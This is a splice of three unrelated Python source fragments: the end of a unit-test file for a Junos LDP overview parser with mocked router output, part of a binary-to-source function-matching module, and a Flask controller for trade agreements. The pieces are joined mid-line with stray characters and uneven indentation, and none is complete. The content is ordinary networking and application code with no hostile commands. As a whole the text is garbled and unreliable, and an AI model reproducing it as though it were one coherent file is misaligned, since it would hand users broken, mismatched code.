'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 0,
'ldp-label-total-allocs': 0,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-nonexistent': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_5 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.1.100
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Connecting: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_5 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.1.100',
'ldp-session-count': {
'ldp-session-connecting': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_parsed_output_6 = {
"ldp-overview-information": {
"ldp-overview": {
"ldp-auto-targeted-session": {
"ldp-auto-targeted-dyn-tun-ses-count": 0,
"ldp-auto-targeted-session-enabled": "disabled"
},
"ldp-bgp-export": "enabled",
"ldp-configuration-sequence": 2,
"ldp-control-mode": "ordered",
"ldp-deaggregate": "disabled",
"ldp-explicit-null": "disabled",
"ldp-gr-overview": {
"ldp-gr-helper": "enabled",
"ldp-gr-max-neighbor-reconnect-time": 120000,
"ldp-gr-max-neighbor-recovery-time": 240000,
"ldp-gr-reconnect-time": 60000,
"ldp-gr-recovery-time": 160000,
"ldp-gr-restart": "enabled",
"ldp-gr-restarting": "false"
},
"ldp-igp-overview": {
"ldp-igp-sync-session-up-delay": 10,
"ldp-tracking-igp-metric": "disabled"
},
"ldp-inet": "enabled",
"ldp-instance-capability": {
"ldp-capability": "none"
},
"ldp-instance-egress-fec-capability": {
"ldp-egress-fec-capability": "entropy-label-capability"
},
"ldp-instance-name": "master",
"ldp-interface-address": {
"interface-address": "10.169.14.157"
},
"ldp-ipv6-tunneling": "disabled",
"ldp-job-overview": {
"ldp-inbound-read-job-loop-quantum": 100,
"ldp-inbound-read-job-time-quantum": 1000,
"ldp-outbound-read-job-loop-quantum": 100,
"ldp-outbound-read-job-time-quantum": 1000,
"ldp-read-job-loop-quantum": 100,
"ldp-read-job-time-quantum": 1000,
"ldp-write-job-loop-quantum": 100,
"ldp-write-job-time-quantum": 1000
},
"ldp-label-allocation": {
"ldp-global-label-current-allocs": 0,
"ldp-label-alloc-failure": 0,
"ldp-label-current-allocs": 3,
"ldp-label-total-allocs": 7,
"ldp-label-total-frees": 4
},
"ldp-loopback-if-added": "no",
"ldp-message-id": 10,
"ldp-mtu-discovery": "disabled",
"ldp-p2mp": {
"ldp-p2mp-no-rsvp-tunneling-enabled": "disabled",
"ldp-p2mp-recursive-route-enabled": "disabled"
},
"ldp-p2mp-transit-lsp-chaining": "disabled",
"ldp-reference-count": 3,
"ldp-retention-mode": "liberal",
"ldp-route-acknowledgement": "enabled",
"ldp-route-preference": 9,
"ldp-router-id": "10.169.14.240",
"ldp-session-count": {
"ldp-control-mode": "ordered",
"ldp-retention-mode": "liberal",
"ldp-session-nonexistent": 1
},
"ldp-session-operational": 1,
"ldp-session-protect-overview": {
"ldp-session-protect": "disabled",
"ldp-session-protect-timeout": 0
},
"ldp-sr-mapping-client": "disabled",
"ldp-strict-targeted-hellos": "disabled",
"ldp-te-overview": {
"ldp-te-bgp-igp": "disabled",
"ldp-te-both-ribs": "disabled",
"ldp-te-mpls-forwarding": "disabled"
},
"ldp-timer-overview": {
"ldp-instance-keepalive-interval": 10,
"ldp-instance-keepalive-timeout": 30,
"ldp-instance-label-withdraw-delay": 60,
"ldp-instance-link-hello-hold-time": 15,
"ldp-instance-link-hello-interval": 5,
"ldp-instance-link-protection-timeout": 120,
"ldp-instance-make-before-break-switchover-delay": 3,
"ldp-instance-make-before-break-timeout": 30,
"ldp-instance-targeted-hello-hold-time": 45,
"ldp-instance-targeted-hello-interval": 15
},
"ldp-transit-lsp-route-stats": "disabled",
"ldp-transport-preference": "IPv4",
"ldp-unicast-transit-lsp-chaining": "disabled"
}
}
}
golden_output_6 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 3
Router ID: 10.169.14.240
LDP inet: enabled
Transport preference: IPv4
Message id: 10
Configuration sequence: 2
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.169.14.121
10.169.14.157
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 3
Total number of LDP labels allocated: 7
Total number of LDP labels freed: 4
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPOverview(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
def test_golden_2(self):
self.device = Mock(**self.golden_output_2)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_2)
def test_golden_3(self):
self.device = Mock(**self.golden_output_3)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_3)
def test_golden_4(self):
self.device = Mock(**self.golden_output_4)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_4)
def test_golden_5(self):
self.device = Mock(**self.golden_output_5)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_5)
def test_golden_6(self):
self.device = Mock(**self.golden_output_6)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_6)
# =================================
# Unit test for 'show ldp session {ipaddress} detail'
# =================================
class TestShowLDPSessionIpaddressDetail(unittest.TestCase):
'''unit test for "show ldp session {ipaddress} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-session-information": {
"ldp-session": {
"ldp-connection-state": "Open",
"ldp-graceful-restart-local": "disabled",
"ldp-graceful-restart-remote": "disabled",
"ldp-holdtime": "30",
"ldp-keepalive-interval": "10",
"ldp-keepalive-time": "3",
"ldp-local-address": "10.34.2.250",
"ldp-local-helper-mode": "enabled",
"ldp-local-label-adv-mode": "Downstream unsolicited",
"ldp-local-maximum-reconnect": "120000",
"ldp-local-maximum-recovery": "240000",
"ldp-mtu-discovery": "disabled",
"ldp-neg-label-adv-mode": "Downstream unsolicited",
"ldp-neighbor-address": "10.169.14.240",
"ldp-neighbor-count": "1",
"ldp-neighbor-types": {
"ldp-neighbor-type": "discovered"
},
"ldp-remaining-time": "23",
"ldp-remote-address": "10.169.14.240",
"ldp-remote-helper-mode": "enabled",
"ldp-remote-label-adv-mode": "Downstream unsolicited",
"ldp-retry-interval": "1",
"ldp-session-address": {
"interface-address": "10.169.14.157"
},
"ldp-session-capabilities-advertised": {
"ldp-capability": "none"
},
"ldp-session-capabilities-received": {
"ldp-capability": "none"
},
"ldp-session-flags": {
"ldp-session-flag": "none"
},
"ldp-session-id": "10.34.2.250:0--10.169.14.240:0",
"ldp-session-max-pdu": "4096",
"ldp-session-nsr-state": "Not in sync",
"ldp-session-protection": {
"ldp-session-protection-state": "disabled"
},
"ldp-session-role": "Passive",
"ldp-session-state": "Operational",
"ldp-up-time": "00:00:47"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp session 10.169.14.240 detail
Address: 10.169.14.240, State: Operational, Connection: Open, Hold time: 23
Session ID: 10.34.2.250:0--10.169.14.240:0
Next | |
frame_size_score = -1 * abs(self.frame - bin_ctx.frame) * FUNC_FRAME_SCORE
# check for a probable match
if abs(frame_size_score) <= FRAME_SIZE_THRESHOLD * FUNC_FRAME_SCORE:
frame_size_score += ARTIFACT_MATCH_SCORE
logger.debug("Frame size score: %f", frame_size_score)
score += frame_size_score
# 5. Match calls
calls_score = ComparableContext.compareCalls(self, bin_ctx)
logger.debug("Calls score: %f", calls_score)
score += calls_score
# 6. Match code blocks
code_blocks_score = 0
for index, block in enumerate(self.blocks):
code_blocks_score -= abs(self.blocks[index] - ((bin_ctx.blocks[index] * instr_ratio) if index < len(bin_ctx.blocks) else 0)) * BLOCK_MATCH_SCORE
for j in range(index + 1, len(bin_ctx.blocks)):
code_blocks_score -= bin_ctx.blocks[j] * BLOCK_MISMATCH_SCORE * instr_ratio
# check for a probable match
if abs(code_blocks_score) <= INSTR_COUNT_THRESHOLD * INSTR_COUNT_SCORE:
code_blocks_score += ARTIFACT_MATCH_SCORE
logger.debug("Code blocks score: %f", code_blocks_score)
score += code_blocks_score
# 7. Match function calls (hints)
call_hints_score = 0
merged_hints = 0
if bin_ctx.call_hints is not None and len(bin_ctx.call_hints) > 0 and self in bin_ctx.call_hints:
merged_hints = len([x for x in bin_ctx.call_hints if x.hash == self.hash])
# prioritize merged hints
call_hints_score += FUNC_HINT_SCORE * 1.0 * (merged_hints ** 1.5) / len(bin_ctx.call_hints)
logger.debug("Call hints score: %f", call_hints_score)
score += call_hints_score
# 8. Match xrefs calls (hints)
if len(bin_ctx.xref_hints) > 0:
xref_hints_score = FUNC_HINT_SCORE * bin_ctx.xref_hints.count(self) * 1.0 / len(bin_ctx.xref_hints)
logger.debug("Xref hints score: %f", xref_hints_score)
score += xref_hints_score
# 9. Existence check (followers) or non static binary function
if len(self.followers) > 0 or not bin_ctx.is_static:
logger.debug("We have (%d) followers / are static (%s) - grant an existence bonus: %f", len(self.followers), str(bin_ctx.is_static), EXISTENCE_BOOST_SCORE)
score += EXISTENCE_BOOST_SCORE
# 10. Match external calls
externals_score = ComparableContext.compareExternals(self, bin_ctx)
logger.debug("Externals score: %f", externals_score)
score += externals_score
# 11. Possible static deduction (if no probability for a collision)
if self.is_static and merged_hints == 0:
static_penalty = 0
for xref in bin_ctx.xrefs:
if self.file not in xref.files:
static_penalty += STATIC_VIOLATION_PENALTY
logger.debug("Static penalty score: %f", static_penalty)
score -= static_penalty
# 12. Score boost
if boost_score:
score *= 2
logger.debug("Score boost")
# Overall result
logger.debug("Overall score is: %f", score)
logger.removeIndent()
return score
def serialize(self):
"""Serialize the context into a dict.
Return Value:
dict representing the context instance, prepared for a future JSON dump
"""
result = {}
result["Function Name"] = self.name
result["Instruction Count"] = self.instrs
result["Stack Frame Size"] = self.frame
result["Hash"] = self.hash
result["Is Static"] = self.is_static
result["Numeric Consts"] = list(self.consts)
result["Strings"] = list(self.strings)
result["Calls"] = list(self.calls)
result["Unknown Functions"] = list(self.unknown_funcs)
result["Unknown Globals"] = list(self.unknown_fptrs)
result["Code Block Sizes"] = self.blocks
result["Call Order"] = self.call_order
return result
@staticmethod
def deserialize(serialized_ctx, source_index):
"""Deserialize the stored context from it's file representation dict.
Args:
serialized_ctx (dict): a dict containing a serialize()d context instance
source_index (int): source index for the current function
Return value:
The newly created context instance, built according to the serialized form
"""
context = SourceContext(serialized_ctx["Function Name"], source_index)
# Numeric Consts
[context.recordConst(int(x)) for x in serialized_ctx["Numeric Consts"]]
# Strings
[context.recordString(x) for x in serialized_ctx["Strings"]]
# Function Calls
[context.recordCall(x) for x in serialized_ctx["Calls"]]
# Unknowns
[context.recordUnknown(x, False) for x in serialized_ctx["Unknown Functions"]]
[context.recordUnknown(x, True) for x in serialized_ctx["Unknown Globals"]]
# Hash
context.setHash(serialized_ctx["Hash"])
# Frame size
context.setFrame(serialized_ctx["Stack Frame Size"])
# Function size
context.setInstrCount(serialized_ctx["Instruction Count"])
# Function Blocks
[context.recordBlock(x) for x in serialized_ctx["Code Block Sizes"]]
# Call order
context.setCallOrder(serialized_ctx["Call Order"])
# Is static
if serialized_ctx["Is Static"]:
context.markStatic()
# Now rank the consts
context.rankConsts()
return context
class BinaryContext(BinFileFunction, FunctionContext):
"""A context that describes the full canonical representation of a binary function, with all of it's logic.
Attributes
----------
call_hints (set): set of potential matches derived by lists of function calls from matched functions
xref_hints (list): list potential matches derived by lists of xrefs from matched functions
collision_map (dict): a mapping of seen collision options: hint id ==> list of possible (seen) collisions
taken_collision (bool): True iff was merged as part of a collision
merged_sources (list): list of merged source functions (in a collision case)
"""
    def __init__(self, ea, name, index):
        """Create a binary function context.

        Args:
            ea (int): effective address of the given code chunk
            name (str): temporary (?) name given by the disassembler
            index (int): index of the function in the global array of all binary functions
        """
        BinFileFunction.__init__(self, ea, name, index)
        FunctionContext.__init__(self)
        # matching hints
        self.call_hints = None  # None == no call hints were registered (yet)
        self.xref_hints = []
        # validity flag
        self.exists = True
        # Compilation clues
        self.is_static = False
        # Linker optimizations
        self.collision_map = defaultdict(set)  # hint hash ==> set of possible (seen) collisions
        self.taken_collision = False
        self.merged_sources = []
    # Overridden base function
    def declareMatch(self, match):
        """Declare a match between our bin context and a source context.

        Args:
            match (SourceContext): the matching source context
        """
        self.match = match
        # notify our hints that we are out of the game
        if self.call_hints is not None:
            for hint in list(self.call_hints):
                self.removeHint(hint, clear=True)
        for hint in list(self.xref_hints):
            self.removeHint(hint, clear=True)
        # If we chose a collision candidate, when we saw the possibility for a collision, it means it is indeed an active collision
        if match.hash in self.collision_map or (len(self.files) > 0 and match.file not in self.files):
            self.merged_sources.append(match)
            self.taken_collision = True
            # make sure that our match will always be in our map
            if match.hash not in self.collision_map:
                self.collision_map[match.hash] = set()
        # make sure the collision map won't allow conflicting collisions:
        # from now on only sources sharing our match's hash may merge in
        new_collisions = defaultdict(set)
        if match.hash in self.collision_map:
            new_collisions[match.hash] = self.collision_map[match.hash]
        self.collision_map = new_collisions
# Overridden base function
def isPartial(self):
"""Tell us that the current instance is a full function.
Return Value:
Always False
"""
return False
# Overridden base function
def valid(self):
"""Check if the function is still valid (still active).
Return Value:
True iff the function still exists in the file matching process
"""
return self.exists
# Overridden base function
def preprocess(self):
"""Preform preprocess calculations once here after initialization, to avoid performance costs later."""
self.rankConsts()
    # Overridden base function
    def active(self):
        """Check if the given function is still in the matching game.

        Return Value:
            True iff the function is valid and wasn't matched yet
        """
        # special case for collisions: a merged (collision) function stays
        # active even after it matched, as long as it can swallow more sources
        return self.valid() and (self.mergePotential() or not self.matched())
# Overridden base function
def selfCheck(self):
"""Double checks our hints, and keeps only those who match our possible file candidates."""
for hint in set(self.xref_hints) | (self.call_hints if self.call_hints is not None else set()):
# bye bye, hint
if not hint.isValidCandidate(self):
self.removeHint(hint)
    # Overridden base function
    def isLinkerOptimizationCandidate(self, src_ctx):
        """Check if the given source context can be a possible match for a linker optimized version of our binary function.

        Args:
            src_ctx (context): source context of the candidate source function

        Return Value:
            True iff the src ctx is file-suitable as a collision match candidate
        """
        # edge case for possible collision candidates
        # 1. Matched to one candidate, and checking to merge more src functions
        if self.merged() and self.match in src_ctx.collision_candidates:
            return True
        # 2. Didn't match yet, however one collision candidate is a valid candidate
        for collision in src_ctx.collision_candidates:
            if collision.file in self.files:
                return True
        # If we reached this point, it looks like they don't belong to each other
        return False
# Overridden base function
def merged(self):
"""Check if this is a merged (collision) function.
Return value:
True iff this is a merged function
"""
return self.taken_collision
def mergePotential(self):
"""Check if this is a collision function with a potential to merge more src functions.
Return value:
True iff this is a merged function with growth potential
"""
return self.matched() and (not self.match.isPartial()) and len([x for x in self.match.collision_candidates if not x.matched()]) > 0
def isHinted(self):
"""Check if our function was hinted at sometimes - meaning we should suspect it is a valid function.
Return value:
True iff the function has any call/xref hint granted by other functions
"""
return (self.call_hints is not None and len(self.call_hints) > 0) or len(self.xref_hints) > 0
def addHints(self, hints, is_call):
"""Add a set of (source) match hints to help us filter our existing hints.
Args:
hint (collection): a collection of (source) function potential matches (containing FunctionContext instances)
is_call (bool): True iff call hints, otherwise xref hints
"""
new_hints = [x for x in hints if x.isValidCandidate(self)]
# Saw | |
import csv
import marshmallow_dataclass as md
from io import StringIO
from datetime import datetime, timedelta
from functools import partial
from flask import make_response
from originexample import logger
from originexample.auth import User, UserQuery, requires_login
from originexample.db import inject_session, atomic
from originexample.http import Controller
from originexample.facilities import Facility, FacilityQuery
from originexample.common import DateTimeRange, DataSet
from originexample.pipelines import start_consume_back_in_time_pipeline
import originexample.services.account as acc
from .helpers import get_resolution, update_transfer_priorities
from .queries import AgreementQuery
from .email import (
send_invitation_received_email,
send_invitation_accepted_email,
send_invitation_declined_email,
)
from .models import (
TradeAgreement,
MappedTradeAgreement,
AgreementDirection,
AgreementState,
GetAgreementListResponse,
GetAgreementSummaryRequest,
GetAgreementSummaryResponse,
SubmitAgreementProposalRequest,
SubmitAgreementProposalResponse,
RespondToProposalRequest,
CountPendingProposalsResponse,
WithdrawProposalRequest,
GetAgreementDetailsRequest,
GetAgreementDetailsResponse,
CancelAgreementRequest,
SetTransferPriorityRequest,
SetFacilitiesRequest,
FindSuppliersRequest,
FindSuppliersResponse,
)
# Module-level client for the (external) account service API
account = acc.AccountService()
# -- Controllers -------------------------------------------------------------
class AbstractAgreementController(Controller):
    """
    Base class for agreement controllers, providing mapping of
    TradeAgreement model instances into MappedTradeAgreement DTOs as
    seen from a specific user's point of view (inbound vs. outbound).
    """

    def map_agreement_for(self, user, agreement):
        """
        Maps the agreement as either inbound or outbound, depending on
        the user's role in it.

        :param TradeAgreement agreement:
        :param User user:
        :rtype: MappedTradeAgreement
        """
        if agreement.is_inbound_to(user):
            return self.map_inbound_agreement(agreement)
        elif agreement.is_outbound_from(user):
            return self.map_outbound_agreement(agreement)
        else:
            # the user is not a party to this agreement at all
            raise RuntimeError('This should NOT have happened!')

    def map_inbound_agreement(self, agreement):
        """
        Maps an agreement from the receiver's perspective: the
        counterpart is the sending user (user_from).

        :param TradeAgreement agreement:
        :rtype: MappedTradeAgreement
        """
        return MappedTradeAgreement(
            direction=AgreementDirection.INBOUND,
            state=agreement.state,
            public_id=agreement.public_id,
            counterpart_id=agreement.user_from.sub,
            counterpart=agreement.user_from.company,
            date_from=agreement.date_from,
            date_to=agreement.date_to,
            amount=agreement.amount,
            unit=agreement.unit,
            amount_percent=agreement.amount_percent,
            technologies=agreement.technologies,
            reference=agreement.reference,
            limit_to_consumption=agreement.limit_to_consumption,
            proposal_note=agreement.proposal_note,
        )

    def map_outbound_agreement(self, agreement):
        """
        Maps an agreement from the sender's perspective: the counterpart
        is the receiving user (user_to), and the sender's selected
        facilities (if any) are included.

        :param TradeAgreement agreement:
        :rtype: MappedTradeAgreement
        """
        # facilities are only loaded when specific GSRNs are selected
        if agreement.facility_gsrn:
            facilities = self.get_facilities(
                agreement.user_from, agreement.facility_gsrn)
        else:
            facilities = []

        return MappedTradeAgreement(
            direction=AgreementDirection.OUTBOUND,
            state=agreement.state,
            public_id=agreement.public_id,
            counterpart_id=agreement.user_to.sub,
            counterpart=agreement.user_to.company,
            date_from=agreement.date_from,
            date_to=agreement.date_to,
            amount=agreement.amount,
            unit=agreement.unit,
            amount_percent=agreement.amount_percent,
            technologies=agreement.technologies,
            reference=agreement.reference,
            limit_to_consumption=agreement.limit_to_consumption,
            proposal_note=agreement.proposal_note,
            facilities=facilities,
        )

    @inject_session
    def get_facilities(self, user, facility_gsrn, session):
        """
        Returns the user's facilities matching any of the given GSRN
        numbers (the session is injected by the decorator).

        :param User user:
        :param list[str] facility_gsrn:
        :param Session session:
        :rtype: list[Facility]
        """
        return FacilityQuery(session) \
            .belongs_to(user) \
            .has_any_gsrn(facility_gsrn) \
            .all()
class GetAgreementList(AbstractAgreementController):
    """
    Returns every agreement relevant to the requesting user,
    grouped by its current state.
    """
    Response = md.class_schema(GetAgreementListResponse)

    @requires_login
    @inject_session
    def handle_request(self, user, session):
        """
        :param User user:
        :param Session session:
        :rtype: GetAgreementListResponse
        """
        def query():
            # a fresh query per group, all against the same session
            return AgreementQuery(session)

        # Invitations currently awaiting response by this user
        pending = (query()
                   .is_proposed_to(user)
                   .is_pending()
                   .order_by(TradeAgreement.created.asc())
                   .all())

        # Invitations sent by this user awaiting response by another user
        sent = (query()
                .is_proposed_by(user)
                .is_pending()
                .order_by(TradeAgreement.created.asc())
                .all())

        # Inbound agreements currently active
        inbound = (query()
                   .is_inbound_to(user)
                   .is_accepted()
                   .order_by(TradeAgreement.created.asc())
                   .all())

        # Outbound agreements currently active, in transfer priority order
        outbound = (query()
                    .is_outbound_from(user)
                    .is_accepted()
                    .order_by(TradeAgreement.transfer_priority.asc())
                    .all())

        # Formerly accepted agreements which have recently been cancelled
        cancelled = (query()
                     .belongs_to(user)
                     .is_cancelled()
                     .is_cancelled_recently()
                     .order_by(TradeAgreement.cancelled.desc())
                     .all())

        # Formerly proposed agreements which have recently been declined
        declined = (query()
                    .belongs_to(user)
                    .is_declined()
                    .is_declined_recently()
                    .order_by(TradeAgreement.declined.desc())
                    .all())

        mapper = partial(self.map_agreement_for, user)

        return GetAgreementListResponse(
            success=True,
            pending=[mapper(a) for a in pending],
            sent=[mapper(a) for a in sent],
            inbound=[mapper(a) for a in inbound],
            outbound=[mapper(a) for a in outbound],
            cancelled=[mapper(a) for a in cancelled],
            declined=[mapper(a) for a in declined],
        )
class GetAgreementDetails(AbstractAgreementController):
    """
    Returns details on a single agreement, identified by its public ID.
    Fails (success=False) if no such agreement belongs to the user.
    """
    Request = md.class_schema(GetAgreementDetailsRequest)
    Response = md.class_schema(GetAgreementDetailsResponse)

    @requires_login
    @inject_session
    def handle_request(self, request, user, session):
        """
        :param GetAgreementDetailsRequest request:
        :param User user:
        :param Session session:
        :rtype: GetAgreementDetailsResponse
        """
        found = (AgreementQuery(session)
                 .has_public_id(request.public_id)
                 .belongs_to(user)
                 .one_or_none())

        mapped = self.map_agreement_for(user, found) if found else None

        return GetAgreementDetailsResponse(
            success=mapped is not None,
            agreement=mapped,
        )
class GetAgreementSummary(AbstractAgreementController):
    """
    Returns a summary of GGOs transferred via agreements, grouped by
    technology, optionally narrowed down to a single agreement and/or
    a specific date range.
    """
    Request = md.class_schema(GetAgreementSummaryRequest)
    Response = md.class_schema(GetAgreementSummaryResponse)

    @requires_login
    @inject_session
    def handle_request(self, request, user, session):
        """
        :param GetAgreementSummaryRequest request:
        :param User user:
        :param Session session:
        :rtype: GetAgreementSummaryResponse
        """
        agreement = None

        # Resolution depends on the size of the requested date range,
        # defaulting to monthly when no range was given
        if request.date_range:
            resolution = get_resolution(request.date_range.delta)
        else:
            resolution = acc.SummaryResolution.MONTH

        # Narrow the summary down to a single agreement, if requested
        if request.public_id:
            agreement = AgreementQuery(session) \
                .has_public_id(request.public_id) \
                .belongs_to(user) \
                .one_or_none()

        # Translate the local direction enum into the account service's enum
        if request.direction is AgreementDirection.INBOUND:
            direction = acc.TransferDirection.INBOUND
        elif request.direction is AgreementDirection.OUTBOUND:
            direction = acc.TransferDirection.OUTBOUND
        else:
            direction = None

        ggos, labels = self.get_agreement_summary(
            request=request,
            token=user.access_token,
            resolution=resolution,
            utc_offset=request.utc_offset,
            direction=direction,
            reference=agreement.public_id if agreement else None,
        )

        return GetAgreementSummaryResponse(
            success=True,
            labels=labels,
            ggos=ggos,
        )

    def get_agreement_summary(self, request, token, resolution, utc_offset,
                              direction=None, reference=None):
        """
        Fetches the transfer summary from the account service,
        grouped by technology.

        :param GetAgreementSummaryRequest request:
        :param str token:
        :param SummaryResolution resolution:
        :param int utc_offset:
        :param TransferDirection direction:
        :param str reference:
        :rtype: (list[DataSet], list[str])
        """
        # only ask the service to fill gaps when an explicit range is given
        if request.date_range:
            begin_range = DateTimeRange.from_date_range(request.date_range)
            fill = True
        else:
            begin_range = None
            fill = False

        response = account.get_transfer_summary(
            token=token,
            request=acc.GetTransferSummaryRequest(
                direction=direction,
                resolution=resolution,
                utc_offset=utc_offset,
                fill=fill,
                grouping=[acc.SummaryGrouping.TECHNOLOGY],
                filters=acc.TransferFilters(
                    reference=[reference] if reference else None,
                    begin_range=begin_range,
                ),
            )
        )

        # one DataSet per technology group
        datasets = [DataSet(g.group[0], g.values) for g in response.groups]

        return datasets, response.labels
class CancelAgreement(Controller):
    """
    Cancels an agreement identified by its public ID, provided it
    belongs to the requesting user, then re-calculates the sender's
    transfer priorities.
    """
    Request = md.class_schema(CancelAgreementRequest)

    @requires_login
    @inject_session
    def handle_request(self, request, user, session):
        """
        :param CancelAgreementRequest request:
